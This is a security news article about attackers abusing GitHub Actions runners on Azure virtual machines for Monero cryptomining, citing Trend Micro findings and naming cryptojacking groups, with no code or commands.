The use of GitHub Actions and Azure virtual machines (VMs) for cloud-based cryptocurrency mining is an indication that malicious actors are making ongoing attempts to target cloud resources for use in illegal activities.
According to a statement made by a researcher from Trend Micro named Magno Logan in a report that was published the week before last, "Attackers can abuse the runners or servers provided by GitHub to run an organization's pipelines and automation by maliciously downloading and installing their own cryptocurrency miners to gain profit easily."
Users are given the ability to automate the software build, testing, and deployment pipeline through the use of GitHub Actions (GHAs), which is a platform for continuous integration and continuous delivery (CI/CD). Using this feature, developers can create workflows that either build and test every pull request to a code repository or deploy merged pull requests to production. Both of these options are available to them.
The Linux and Windows runners are both housed on Azure's Standard DS2 v2 virtual machines, which each have two virtual CPUs and seven gigabytes of memory available to them.
The Japanese company stated that it found over 550 code samples and over 1,000 repositories that are utilizing the platform to mine cryptocurrency by utilizing the runners that are provided by GitHub. The Japanese company also stated that it found over 1,000 repositories. The problem has been brought to the attention of the code-hosting service that Microsoft owns.
In addition to this, 11 different repositories were discovered to be hosting variants of a YAML script that contained commands to mine Monero coins. Each of these scripts relied on the same wallet, which suggests that it is either the work of a single person or a group of people working together.
"End users shouldn't have any reason to worry as long as the malicious actors only use their own accounts and repositories," said Logan. "[T]here is no reason for end users to be concerned." When these GHAs are shared on GitHub Marketplace or when they are used as a dependency for other Actions, problems can arise.
Cryptojacking-focused groups are known to infiltrate cloud deployments by exploiting a security flaw within the target systems themselves. These security flaws can take the form of an unpatched vulnerability, weak credentials, or a cloud implementation that has been improperly configured.
8220, Keksec (also known as Kek Security), Kinsing, Outlaw, and TeamTNT are some of the most notable actors operating in the underground cryptocurrency mining industry today.
In addition, the malware toolset is characterized by the use of kill scripts, which terminate and delete competing cryptocurrency miners in order to abuse the cloud systems to the best of their ability for their own benefit. Trend Micro refers to this as a battle "fought for control of the victim's resources."
Having said that, the deployment of cryptominers, in addition to resulting in infrastructure and energy costs, is also a barometer of poor security hygiene. This is because it enables threat actors to weaponize the initial access gained through a cloud misconfiguration for far more damaging goals such as data exfiltration or ransomware.
In a previous report, the organization mentioned that "one unique aspect [...] is that malicious actor groups do not only have to deal with a target organization's security systems and staff, but they also have to compete with one another for limited resources." This is because there are only so many resources available.
"The struggle to seize and maintain control over a victim's servers is a major driving force in the evolution of these groups' tools and techniques, prompting them to constantly improve their ability to remove competitors from compromised systems and, at the same time, resist being removed themselves."
Post a Comment
Your suggestions and comments are welcome